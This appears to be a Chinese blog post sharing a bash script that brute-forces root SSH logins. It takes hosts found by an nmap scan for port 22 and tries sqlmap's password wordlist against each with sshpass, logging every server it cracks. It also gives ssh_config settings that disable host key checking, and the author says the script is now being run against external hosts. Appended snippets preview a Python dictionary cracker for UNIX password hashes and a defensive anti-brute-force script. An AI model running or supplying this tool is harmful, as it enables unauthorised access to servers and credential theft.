突然間懵生了乙個想法 然後就做了(第一次覺得工作這麼有趣!!!) 內網已經測試能夠成功 外網正在測試,字典比較大估計要跑好幾天
先把指令碼貼出來:
#!bin/bash
gateway=172.16.80
#nmap -p 22 172.16.81.* |grep open -a3 |grep for|cut -d " " -f5 >hosts
hosts=`cat hosts`
pass=`cat wordlist.txt`
#sshpass -p "yuan" ssh [email protected] "ls"
#[ $? == 0 ] && echo "the server is ok "
for i in $hosts; do
echo "正在準備請稍後"
for p in $pass; do
echo "server is $i passwd is $p"
sshpass -p "$p" ssh root@$i "ls"
[ $? == 0 ] && echo "這台server $i已經破解 $p" >>server 2>&1
done
done
hosts 是通過nmap 掃瞄出來22埠為開啟狀態的主機
wordlist.txt 是sqlmap自帶的暴力破解字典 大概11m左右
ssh_config 新增配置:
stricthostkeychecking no
compression yes
serveraliveinterval 60
serveralivecountmax 5
controlmaster auto
controlpath ~/.ssh/sockets/%r@%h-%p
controlpersist 4h
用SHELL指令碼來防SSH暴力破解
由於機器已經在跑重要的業務,我又不想去公升級核心,免得影響正常的 運營,所以iptables的想法暫時告一段落 後來我又想到用hostsdeny的方法來解決這個問題,感覺這個方法還是比較繁瑣,還不如自己手動寫指令碼來解決這個麻煩,指令碼內容如下 bin bash cat var log secure...
用SHELL指令碼來防SSH暴力破解
由於機器已經在跑重要的業務,我又不想去公升級核心,免得影響正常的 運營,所以iptables的想法暫時告一段落 後來我又想到用hostsdeny的方法來解決這個問題,感覺這個方法還是比較繁瑣,還不如自己手動寫指令碼來解決這個麻煩,指令碼內容如下 bin bash cat var log secure...
Python 暴力破解UNIX密碼指令碼
coding utf 8 暴力破解unix的密碼,需要輸入字典檔案和unix的密碼檔案 遍歷整個字典,試圖用常用的鹽值來匹配破解雜湊密碼 import crypt def testpass cryptpass salt cryptpass 0 2 dictfile open dictionary.t...